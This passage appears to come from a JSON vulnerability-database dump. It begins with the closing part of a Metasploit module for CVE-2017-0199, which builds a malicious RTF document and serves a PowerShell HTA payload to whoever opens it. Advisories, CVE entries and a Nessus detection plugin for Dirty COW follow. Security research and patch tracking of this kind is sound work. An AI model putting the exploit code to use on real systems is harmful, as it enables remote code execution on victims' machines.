................\n ministream_data << \"00000000000000000000000000000000\" # 00000120: ................\n ministream_data << \"00000000000000000000000000000000\" # 00000130: ................\n ministream_data << \"00000000000000000000000000000000\" # 00000140: ................\n ministream_data << \"00000000000000000000000000000000\" # 00000150: ................\n ministream_data << \"00000000000000000000000000000000\" # 00000160: ................\n ministream_data << \"00000000000000000000000000000000\" # 00000170: ................\n ministream_data << \"00000000000000000000000000000000\" # 00000180: ................\n ministream_data << \"00000000000000000000000000000000\" # 00000190: ................\n ministream_data << \"00000000000000000000000000000000\" # 000001a0: ................\n ministream_data << \"00000000000000000000000000000000\" # 000001b0: ................\n ministream_data << \"00000000000000000000000000000000\" # 000001c0: ................\n ministream_data << \"00000000000000000000000000000000\" # 000001d0: ................\n ministream_data << \"00000000000000000000000000000000\" # 000001e0: ................\n ministream_data << \"00000000000000000000000000000000\" # 000001f0: ................\n ministream_data\n end\n\n def create_rtf_format\n template_path = ::File.join(Msf::Config.data_directory, \"exploits\", \"cve-2017-0199.rtf\")\n template_rtf = ::File.open(template_path, 'rb')\n\n data = template_rtf.read(template_rtf.stat.size)\n data.gsub!('MINISTREAM_DATA', create_ole_ministream_data)\n template_rtf.close\n data\n end\n\n def on_request_uri(cli, req)\n p = regenerate_payload(cli)\n data = Msf::Util::EXE.to_executable_fmt(\n framework,\n ARCH_X86,\n 'win',\n p.encoded,\n 'hta-psh',\n { :arch => ARCH_X86, :platform => 'win' }\n )\n\n send_response(cli, data, 'Content-Type' => 'application/hta')\n end\n\n def exploit\n file_create(create_rtf_format)\n super\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, 
"sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/office_word_hta.rb"}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:54", "bulletinFamily": "unix", "description": "[12:2.9.0-17.el7]\n- i386: Remove generic SMT thread check (Babu Moger) [Orabug: 28676425]\n- pc: Fix typo on PC_COMPAT_2_12 (Eduardo Habkost) [Orabug: 28676425]\n- i386: Enable TOPOEXT feature on AMD EPYC CPU (Babu Moger) [Orabug: 28676425]\n- net: ignore packet size greater than INT_MAX (Jason Wang) [Orabug: 28762625] {CVE-2018-17963}\n- pcnet: fix possible buffer overflow (Jason Wang) [Orabug: 28762617] {CVE-2018-17962}\n- rtl8139: fix possible out of bound access (Jason Wang) [Orabug: 28762613] {CVE-2018-17958}\n- ne2000: fix possible out of bound access in ne2000_receive (Jason Wang) [Orabug: 28733338] {CVE-2018-10839}\n- seccomp: set the seccomp filter to all threads (Marc-Andre Lureau) [Orabug: 28576303] {CVE-2018-15746}\n- virtio_net: Introduce VIRTIO_NET_F_STANDBY feature bit to virtio_net (Venu Busireddy) [Orabug: 28497003]\n- virtio-net: use 64-bit values for feature flags (Jason Baron) [Orabug: 28497003]\n- qga: check bytes count read by guest-file-read (Prasad J Pandit) [Orabug: 28312939] {CVE-2018-12617}\n- CVE-2017-2630: Qemu: nbd: oob stack write in client routine drop_sync (Mark Kanda) [Orabug: 28424694] {CVE-2017-2630}\n- CVE-2017-2633: Qemu: VNC: memory corruption due to unchecked resolution limit (Mark Kanda) [Orabug: 28424697] {CVE-2017-2633}\n- CVE-2017-7471: Qemu: 9p: virtfs allows guest to change filesystem attributes (Mark Kanda) [Orabug: 28407849] {CVE-2017-7471}\n- slirp: correct size computation while concatenating mbuf (Prasad J Pandit) [Orabug: 28263244] {CVE-2018-11806}", "modified": "2018-10-29T00:00:00", "published": "2018-10-29T00:00:00", "id": "ELSA-2018-4262", "href": "http://linux.oracle.com/errata/ELSA-2018-4262.html", "title": "qemu security update", "type": "oraclelinux", "cvss": {"score": 7.7, 
"vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2019-10-16T17:30:09", "bulletinFamily": "NVD", "description": "Systems with microprocessors utilizing speculative execution and speculative execution of memory reads before the addresses of all prior memory writes are known may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis, aka Speculative Store Bypass (SSB), Variant 4.", "modified": "2019-05-23T15:29:00", "id": "CVE-2018-3639", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-3639", "published": "2018-05-22T12:29:00", "title": "CVE-2018-3639", "type": "cve", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-10-10T12:22:17", "bulletinFamily": "NVD", "description": "Systems with microprocessors utilizing speculative execution and branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis.", "modified": "2019-04-23T19:30:00", "id": "CVE-2017-5753", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5753", "published": "2018-01-04T13:29:00", "title": "CVE-2017-5753", "type": "cve", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}], "suse": [{"lastseen": "2016-10-31T13:28:00", "bulletinFamily": "unix", "description": "This update for the Linux Kernel 3.12.62-60_62 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-5195: A local privilege escalation using MAP_PRIVATE was fixed,\n which is reportedly exploited in the wild (bsc#1004419).\n - CVE-2016-8666: The IP stack in the Linux kernel allowed remote attackers\n to cause a denial of service (stack consumption and panic) or possibly\n have unspecified other impact by triggering use of the GRO path for\n packets with tunnel stacking, as demonstrated by interleaved IPv4\n headers and GRE headers, a related issue to CVE-2016-7039 (bsc#1001486).\n\n", "modified": 
"2016-10-31T11:08:38", "published": "2016-10-31T11:08:38", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00072.html", "id": "SUSE-SU-2016:2673-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 7 for SLE 12 SP1 (important)", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-10-26T01:27:43", "bulletinFamily": "unix", "description": "This update for the Linux Kernel 3.12.57-60_35 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-5195: A local privilege escalation using MAP_PRIVATE was fixed,\n which is reportedly exploited in the wild (bsc#1004419).\n - CVE-2016-8666: The IP stack in the Linux kernel allowed remote attackers\n to cause a denial of service (stack consumption and panic) or possibly\n have unspecified other impact by triggering use of the GRO path for\n packets with tunnel stacking, as demonstrated by interleaved IPv4\n headers and GRE headers, a related issue to CVE-2016-7039 (bsc#1001487).\n\n", "modified": "2016-10-26T03:10:09", "published": "2016-10-26T03:10:09", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00058.html", "id": "SUSE-SU-2016:2638-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 4 for SLE 12 SP1 (important)", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-10-26T01:27:43", "bulletinFamily": "unix", "description": "This update for the Linux Kernel 3.12.59-60_45 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-5195: A local privilege escalation using MAP_PRIVATE was fixed,\n which is reportedly exploited in the wild (bsc#1004419).\n - CVE-2016-8666: The IP stack in the Linux kernel allowed remote attackers\n to cause a denial of service (stack consumption and panic) or possibly\n have unspecified other impact by triggering use of the GRO path for\n packets with 
tunnel stacking, as demonstrated by interleaved IPv4\n headers and GRE headers, a related issue to CVE-2016-7039 (bsc#1001487).\n\n", "modified": "2016-10-26T03:09:35", "published": "2016-10-26T03:09:35", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00057.html", "id": "SUSE-SU-2016:2637-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 6 for SLE 12 SP1 (important)", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-10-26T01:27:43", "bulletinFamily": "unix", "description": "This update for the Linux Kernel 3.12.59-60_41 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-5195: A local privilege escalation using MAP_PRIVATE was fixed,\n which is reportedly exploited in the wild (bsc#1004419).\n - CVE-2016-8666: The IP stack in the Linux kernel allowed remote attackers\n to cause a denial of service (stack consumption and panic) or possibly\n have unspecified other impact by triggering use of the GRO path for\n packets with tunnel stacking, as demonstrated by interleaved IPv4\n headers and GRE headers, a related issue to CVE-2016-7039 (bsc#1001487).\n\n", "modified": "2016-10-26T03:08:28", "published": "2016-10-26T03:08:28", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00055.html", "id": "SUSE-SU-2016:2635-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 5 for SLE 12 SP1 (important)", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-12-13T08:54:14", "bulletinFamily": "scanner", "description": "An update for kernel-rt is now available for Red Hat Enterprise MRG\n2.5.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which\nenables fine-tuning for systems with extremely high determinism\nrequirements.\n\nSecurity Fix(es) :\n\n* A race condition was found in the way the Linux kernel", "modified": "2019-12-02T00:00:00", "id": "REDHAT-RHSA-2016-2107.NASL", "href": "https://www.tenable.com/plugins/nessus/94315", "published": "2016-10-27T00:00:00", "title": "RHEL 6 : MRG (RHSA-2016:2107) (Dirty COW)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:2107. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94315);\n script_version(\"2.23\");\n script_cvs_date(\"Date: 2019/10/24 15:35:42\");\n\n script_cve_id(\"CVE-2016-5195\", \"CVE-2016-7039\", \"CVE-2016-8666\");\n script_xref(name:\"RHSA\", value:\"2016:2107\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"RHEL 6 : MRG (RHSA-2016:2107) (Dirty COW)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel-rt is now available for Red Hat Enterprise MRG\n2.5.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which\nenables fine-tuning for systems with extremely high determinism\nrequirements.\n\nSecurity Fix(es) :\n\n* A race condition was found in the way the Linux kernel's memory\nsubsystem handled the copy-on-write (COW) breakage of private\nread-only memory mappings. An unprivileged, local user could use this\nflaw to gain write access to otherwise read-only memory mappings and\nthus increase their privileges on the system. (CVE-2016-5195,\nImportant)\n\n* Linux kernel built with the 802.1Q/802.1ad VLAN(CONFIG_VLAN_8021Q)\nOR Virtual eXtensible Local Area Network(CONFIG_VXLAN) with\nTransparent Ethernet Bridging(TEB) GRO support, is vulnerable to a\nstack overflow issue. It could occur while receiving large packets via\nGRO path; As an unlimited recursion could unfold in both VLAN and TEB\nmodules, leading to a stack corruption in the kernel. 
(CVE-2016-7039,\nImportant)\n\nRed Hat would like to thank Phil Oester for reporting CVE-2016-5195.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:2107\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5195\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-7039\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8666\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-5195\", \"CVE-2016-7039\", \"CVE-2016-8666\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2016:2107\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:2107\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message 
= \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL6\", rpm:\"mrg-release\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MRG\");\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-debuginfo-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-devel-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-common-x86_64-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-devel-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-rt-doc-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-rt-firmware-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-debuginfo-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-devel-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-debuginfo-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-devel-3.10.0-327.rt56.198.el6\")) flag++;\n\n 
if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-rt / kernel-rt-debug / kernel-rt-debug-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-13T08:54:14", "bulletinFamily": "scanner", "description": "An update for kernel-rt is now available for Red Hat Enterprise Linux\n7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which\nenables fine-tuning for systems with extremely high determinism\nrequirements.\n\nSecurity Fix(es) :\n\n* A race condition was found in the way the Linux kernel", "modified": "2019-12-02T00:00:00", "id": "REDHAT-RHSA-2016-2110.NASL", "href": "https://www.tenable.com/plugins/nessus/94316", "published": "2016-10-27T00:00:00", "title": "RHEL 7 : kernel-rt (RHSA-2016:2110) (Dirty COW)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:2110. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94316);\n script_version(\"2.23\");\n script_cvs_date(\"Date: 2019/10/24 15:35:42\");\n\n script_cve_id(\"CVE-2016-5195\", \"CVE-2016-7039\", \"CVE-2016-8666\");\n script_xref(name:\"RHSA\", value:\"2016:2110\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"RHEL 7 : kernel-rt (RHSA-2016:2110) (Dirty COW)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel-rt is now available for Red Hat Enterprise Linux\n7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which\nenables fine-tuning for systems with extremely high determinism\nrequirements.\n\nSecurity Fix(es) :\n\n* A race condition was found in the way the Linux kernel's memory\nsubsystem handled the copy-on-write (COW) breakage of private\nread-only memory mappings. An unprivileged, local user could use this\nflaw to gain write access to otherwise read-only memory mappings and\nthus increase their privileges on the system. (CVE-2016-5195,\nImportant)\n\n* Linux kernel built with the 802.1Q/802.1ad VLAN(CONFIG_VLAN_8021Q)\nOR Virtual eXtensible Local Area Network(CONFIG_VXLAN) with\nTransparent Ethernet Bridging(TEB) GRO support, is vulnerable to a\nstack overflow issue. 
It could occur while receiving large packets via\nGRO path; As an unlimited recursion could unfold in both VLAN and TEB\nmodules, leading to a stack corruption in the kernel. (CVE-2016-7039,\nImportant)\n\nRed Hat would like to thank Phil Oester for reporting CVE-2016-5195.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:2110\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5195\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-7039\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8666\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-kvm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-kvm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-kvm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", 
value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
